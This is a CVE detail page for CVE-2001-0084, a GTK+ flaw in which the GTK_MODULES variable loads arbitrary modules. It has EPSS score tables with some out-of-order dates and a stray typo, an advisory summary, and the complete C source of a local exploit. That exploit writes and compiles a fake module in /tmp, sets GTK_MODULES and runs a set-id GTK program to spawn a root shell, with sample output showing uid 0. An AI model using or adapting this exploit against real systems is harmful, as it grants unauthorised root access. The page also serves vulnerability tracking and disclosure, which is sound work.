CVE-2001-0084 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-12-22	–	–	–	0.05%	–
2025-03-02	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-03-09	–	–	–	0.05%	–
2025-03-18	–	–	–	–	0.28%
2025-03-30	–	–	–	–	0.28%
2025-04-15	–	–	–	–	0.28%
2025-04-16	–	–	–	–	0.28%
2025-04-16	–	–	–	–	0.28,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2024-12-22	18%
2025-03-02	19%
2025-01-19	18%
2025-03-09	19%
2025-03-18	49%
2025-03-30	48%
2025-04-15	5%
2025-04-16	51%
2025-04-16	51%

// source: https://www.securityfocus.com/bid/2165/info GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges. The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code. /* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. this will give you the euid/egid of a set*id program using gtk+. this exploit works via the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary functions/commands with a bogus module. (using gtk_module_init()) example(./xgtk): ------------------------------------------------------------------------------- # ls -l /usr/bin/X11/gtk_program -rwxr-sr-x 1 root tty 437625 Oct 23 1999 /usr/bin/X11/gtk_program # cc xgtk.c -o xgtk # ./xgtk /usr/bin/X11/gtk_program :0.0 [ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ] [ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ] [*] making module for gtk+ to execute. (/tmp/gtkm.c) [*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so) [*] done, checking to see if the module comiled. (/tmp/gtkm.so) [*] done, setting up the environment. (module&display) [*] done, executing /usr/bin/X11/gtk_program, the module should load now. [*] success, module loaded successfully. [*] id stats: uid: 0, euid: 0, gid: 0, egid: 5. [*] now executing: /bin/sh. # ------------------------------------------------------------------------------- note: this will require a valid display to exploit successfully. also, i'm unsure of this for other gtk versions, i would just assume as much that this applies to it. */ #define GCCPATH "/usr/bin/gcc" // path to gcc. #define SRCFILE "/tmp/gtkm.c" // source to the fake module to load. #define MODEXEC "/tmp/gtkm.so" // fake module to load. #define DISPLAY ":0.0" // default display. (also argv option) #define EXECUTE "/bin/sh" // execute this program. #include <stdio.h> #include <sys/stat.h> int main(int argc,char **argv){ char cmd[256],syscmd[256],display[256]; struct stat mod1,mod2,mod3; FILE *source; fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]" "\n"); if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));} else{ fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]); exit(-1); } if(argc>2){strncpy(display,argv[2],sizeof(display));} else{strncpy(display,DISPLAY,sizeof(display));} if(stat(cmd,&mod1)){ fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd); exit(-1); } if(stat(GCCPATH,&mod2)){ fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH); exit(-1); } fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display); fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE); unlink(SRCFILE); unlink(MODEXEC); source=fopen(SRCFILE,"w"); fprintf(source,"#include <stdio.h>\n"); fprintf(source,"void gtk_module_init(){\n"); fprintf(source," unlink(\"%s\");\n",SRCFILE); fprintf(source," unlink(\"%s\");\n",MODEXEC); fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n" "\");\n"); fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d" ", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE); fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE); fprintf(source," execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE); fprintf(source,"}\n"); fclose(source); fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE, MODEXEC); snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s %s 1>/dev/null 2>&1",GCCPATH, MODEXEC,SRCFILE); system(syscmd); fprintf(stderr,"[*] done, checking to see if the module comiled. (%s)\n", MODEXEC); if(stat(MODEXEC,&mod3)){ fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n", MODEXEC); exit(-1); } fprintf(stderr,"[*] done, setting up the environment. (module&display)\n"); setenv("GTK_MODULES",MODEXEC,1); setenv("DISPLAY",display,1); fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd); if(execl(cmd,cmd,0)){ fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd); unlink(SRCFILE); unlink(MODEXEC); exit(-1); } }